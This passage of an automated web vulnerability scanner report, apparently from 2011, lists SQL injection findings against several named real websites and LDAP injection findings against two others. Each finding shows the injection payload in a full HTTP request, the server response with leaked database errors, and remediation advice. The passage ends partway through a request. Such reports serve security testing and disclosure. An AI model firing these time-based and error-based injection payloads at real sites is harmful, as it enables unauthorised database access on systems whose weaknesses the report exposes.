2.68. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22&CareerID=4'&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:19:42 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 8510

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<div id="mainContent">
   
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...
2.69. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=22'&CareerID=4&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:18:45 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17285

<!-- careers start -->

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELEC
...[SNIP]...
2.70. http://www.scout.com/2/a.z [cfg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /2/a.z

Issue detail

The cfg parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the cfg parameter. The application took 20128 milliseconds to respond to the request, compared with 218 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /2/a.z?cfg=2=1'waitfor%20delay'0%3a0%3a20'--&p=26&s=143 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=Jwu5zEjpq0Q-W60ACS9; __utmz=202704078.1303516031.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.454375544.1303509265.1303522301.1304728142.4; __utmc=202704078; __utmb=202704078.4.9.1304728228796

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 19:31:35 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 19:41:15 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 11936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
2.71. http://www.scout.com/a.z [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The c parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the c parameter. The application took 20379 milliseconds to respond to the request, compared with 707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /a.z?s=143&p=9&c=2waitfor%20delay'0%3a0%3a20'--&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:00:39 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27058

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
2.72. http://www.scout.com/a.z [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The c parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the c parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=143&p=9&c=2'&cid=1037787&nid=4811607&fhn=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:00:17 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:10:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 158 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Vary: Accept-Encoding
Content-Length: 27298

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',4811607,null,null,null,null,null,null,null,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 S
...[SNIP]...
2.73. http://www.scout.com/a.z [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the cid parameter. The application took 21352 milliseconds to respond to the request, compared with 707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /a.z?s=143&p=9&c=2&cid=1037787waitfor%20delay'0%3a0%3a20'--&nid=4811607&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:02:23 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:12:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 27128

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
2.74. http://www.scout.com/a.z [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The cid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=143&p=9&c=2&cid=1037787'&nid=4811607&fhn=1&sSeasonYears=4811607 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:01:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:11:21 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 151 ms
Vary: Accept-Encoding
Content-Length: 27936

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
<!--
ERROR in function:    "DB_Commentary_GET()"
- Local date/time :    Friday, May 06, 2011 1:01:21 PM
- Source :        undefined
- Message :        undefined
- message :        Unclosed quotation mark after the character string ''.
- Number :        0
- Description :        undefined
- description :        Unclosed quotation mark after the character string ''.
- URL:        s=143&p=9&c=2&cid=1037787'&nid=48116
...[SNIP]...
2.75. http://www.scout.com/a.z [nid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The nid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the nid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607'&fhn=1&sSeasonYears=4811607 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:02:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:12:21 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
X-Streamed: from 192.168.20.181 in 49 ms
Vary: Accept-Encoding
Content-Length: 13733

<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,null,null,null,null,null,null,null'.--><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E
...[SNIP]...
2.76. http://www.scout.com/a.z [nid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The nid parameter appears to be vulnerable to SQL injection attacks. The payload waitfor%20delay'0%3a0%3a20'-- was submitted in the nid parameter. The application took 20222 milliseconds to respond to the request, compared with 707 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

POST /a.z?s=143&p=9&c=2&cid=1037787&nid=4811607waitfor%20delay'0%3a0%3a20'--&fhn=1 HTTP/1.1
Referer: http://www.scout.com/a.z?s=143&p=9&c=2&cid=1037787&nid=4811607&fhn=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.scout.com
Cookie: RefId=0; BrandId=0; SessionBrandId=0
Accept-Encoding: gzip, deflate
Content-Length: 61

__VIEWSTATE=%2fwEPDwULLTEzNzQyNzE0MDlkZA%3d%3d&q=Search+Scout

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Fri, 06 May 2011 20:04:04 GMT
Content-Type: text/html; charset=utf-8
Expires: Fri, 06 May 2011 20:13:44 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.12737
Vary: Accept-Encoding
Content-Length: 13442

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Zack Williams Profile</title>
<meta http
...[SNIP]...
2.77. http://www.socialfollow.com/button/image/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the b parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /button/image/?b=1' HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.2.10.1304721456

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:40:55 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...
3. LDAP injection  previous  next
There are 2 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

3.1. http://www.dominionenterprises.com/main/do/Careers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Careers

Issue detail

The REST URL parameter 3 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /main/do/*)(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:26 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=ec8318b7ec9c1aec4cccc43a2cfd61b4; expires=Sun, 08 May 2011 19:36:26 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:26 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html
Set-Cookie: TSa27990=3889173c8335cc2b8a01f99c2edb15b1b4d5d0d9198b18674dc443739c5eca85e1bf282b; Path=/

Request 2

GET /main/do/*)!(sn=* HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725150345; s_lv=1304725150346; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:36:27 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=fbdf302905adb668a06e8b9c3ffaa68f; expires=Sun, 08 May 2011 19:36:27 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:36:27 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Length: 0
Content-Type: text/html

3.2. http://www.hunton.com/professionals/uniGC.aspx [LastName parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.hunton.com
Path:   /professionals/uniGC.aspx

Issue detail

The LastName parameter appears to be vulnerable to LDAP injection attacks.

The payloads 7cce339ef57f7f63)(sn=* and 7cce339ef57f7f63)!(sn=* were each submitted in the LastName parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 1

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:21 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43380


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
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
...[SNIP]...

Request 2

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)!(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
